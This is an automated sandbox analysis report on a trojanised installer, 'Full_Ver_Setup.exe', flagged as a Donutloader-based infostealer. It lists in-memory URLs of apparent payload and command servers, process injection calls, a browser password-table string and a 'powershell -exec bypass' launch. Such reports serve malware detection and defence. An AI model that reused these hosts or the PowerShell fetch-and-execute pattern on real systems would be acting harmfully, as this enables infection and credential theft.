Source: Full_Ver_Setup.exe, 00000000.00000003.1946447013.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/r
Source: Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1922392393.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012249509.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1946447013.0000000000834000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1992514646.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/s
Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/x
Source: Full_Ver_Setup.exe, 00000000.00000003.1900728110.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click:443/api((
Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012249509.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click:443/api_PROFILE_STRING=Internet
Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click:443/apiell
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtf1
Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop:443/int_clp_ldr_sha.txtn
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://neqi.shop/
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://neqi.shop/Y
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000085E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://neqi.shop/sdgjyut/psh.txtY)
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://neqi.shop/sdgjyut/psh.txtc
Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://neqi.shop:443/sdgjyut/psh.txt
Source: Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: powershell.exe, 00000004.00000002.2180106835.0000000005735000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ
Source: powershell.exe, 00000004.00000002.2178588154.000000000344F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178588154.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2180079470.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2179797544.0000000003760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2184472007.0000000007B59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank
Source: powershell.exe, 00000004.00000002.2178588154.0000000003476000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landingmancet
Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phish
Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ
Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX)
Source: powershell.exe, 00000004.00000002.2180106835.0000000005735000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: powershell.exe, 00000004.00000002.2178588154.000000000344F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178588154.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2180079470.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2179797544.0000000003760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2184472007.0000000007B59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c
Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49748 version: TLS 1.2

System Summary

barindex
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0324C989 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread, 0_2_0324C989
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_032003C9 0_2_032003C9
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0324C989 0_2_0324C989
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03222316 0_2_03222316
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03237316 0_2_03237316
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03217378 0_2_03217378
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0321E346 0_2_0321E346
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0322F3A8 0_2_0322F3A8
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03235246 0_2_03235246
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0321B2A6 0_2_0321B2A6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0322C19F 0_2_0322C19F
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0322D2DF 0_2_0322D2DF
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0320A126 0_2_0320A126
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323B116 0_2_0323B116
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03205116 0_2_03205116
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323F146 0_2_0323F146
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0322C1A4 0_2_0322C1A4
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0320A1F6 0_2_0320A1F6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0320C046 0_2_0320C046
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0321A056 0_2_0321A056
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_032370B6 0_2_032370B6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_032070F6 0_2_032070F6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0321C700 0_2_0321C700
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03204716 0_2_03204716
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03221746 0_2_03221746
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03230756 0_2_03230756
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03232756 0_2_03232756
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0321275A 0_2_0321275A
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323C7A3 0_2_0323C7A3
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0321F7B6 0_2_0321F7B6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323F786 0_2_0323F786
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03238636 0_2_03238636
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0321D6E6 0_2_0321D6E6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0320A6D6 0_2_0320A6D6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03218526 0_2_03218526
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03215536 0_2_03215536
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03232506 0_2_03232506
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323F426 0_2_0323F426
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03210413 0_2_03210413
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0320E487 0_2_0320E487
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03225BB6 0_2_03225BB6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03228B8D 0_2_03228B8D
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03226A06 0_2_03226A06
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03205AC6 0_2_03205AC6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0322CADF 0_2_0322CADF
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323696A 0_2_0323696A
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323A9B6 0_2_0323A9B6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_032079E6 0_2_032079E6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0320A9D6 0_2_0320A9D6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0321D9D6 0_2_0321D9D6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_032378C6 0_2_032378C6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03225F26 0_2_03225F26
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323CF30 0_2_0323CF30
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03235F61 0_2_03235F61
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03228F6C 0_2_03228F6C
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03209FA6 0_2_03209FA6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0321AFA6 0_2_0321AFA6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03217F8D 0_2_03217F8D
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323AE26 0_2_0323AE26
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03207E76 0_2_03207E76
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03210E5D 0_2_03210E5D
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323EED6 0_2_0323EED6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0320ED0B 0_2_0320ED0B
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0321DDE6 0_2_0321DDE6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0320ADC6 0_2_0320ADC6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03211C73 0_2_03211C73
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03208C56 0_2_03208C56
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03237CA6 0_2_03237CA6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0322ECB0 0_2_0322ECB0
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323CCE9 0_2_0323CCE9
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: String function: 03209816 appears 76 times
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: String function: 03215526 appears 73 times
Source: Full_Ver_Setup.exe Static PE information: invalid certificate
Source: Full_Ver_Setup.exe Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Full_Ver_Setup.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: Full_Ver_Setup.exe, 00000000.00000000.1698059100.000000000053F000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Ver_Setup.exe
Source: Full_Ver_Setup.exe, 00000000.00000003.1824574336.000000000396D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Ver_Setup.exe
Source: Full_Ver_Setup.exe Binary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Ver_Setup.exe
Source: Full_Ver_Setup.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process created: Commandline size = 4588
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process created: Commandline size = 4588 Jump to behavior
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@3/3
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03200AD9 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle, 0_2_03200AD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fs5g2pay.usn.ps1 Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Full_Ver_Setup.exe, 00000000.00000003.1900728110.0000000003F01000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Full_Ver_Setup.exe Virustotal: Detection: 12%
Source: Full_Ver_Setup.exe String found in binary or memory: -Helper process exited with failure code: 0x%x
Source: Full_Ver_Setup.exe String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
Source: Full_Ver_Setup.exe String found in binary or memory: /LoadInf=
Source: Full_Ver_Setup.exe String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File read: C:\Users\user\Desktop\Full_Ver_Setup.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Full_Ver_Setup.exe "C:\Users\user\Desktop\Full_Ver_Setup.exe"
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> < Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: coremessaging.dll Jump to behavior
